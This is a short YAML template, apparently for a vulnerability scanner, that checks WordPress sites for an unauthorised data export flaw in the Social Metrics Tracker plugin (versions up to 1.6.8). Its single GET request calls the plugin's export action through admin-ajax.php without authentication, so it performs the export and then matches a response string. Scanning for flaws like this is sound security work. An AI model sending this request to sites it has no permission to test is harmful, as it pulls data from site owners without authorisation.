id: wordpress-social-metrics-tracker
info:
  name: Social Metrics Tracker <= 1.6.8 - Unauthorised Data Export
  risk: Medium

params:
  - root: '{{.BaseURL}}'

replicate:
  prefixes: 'blog, news, docs'

requests:
  - method: GET
    redirect: false
    url: >-
      {{.root}}/wp-admin/admin-ajax.php?page=social-metrics-tracker-export&smt_download_export_file=1
    headers:
      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
    detections:
      - >-
        StatusCode() == 200 && StringSearch("body", 'Main URL to Post')

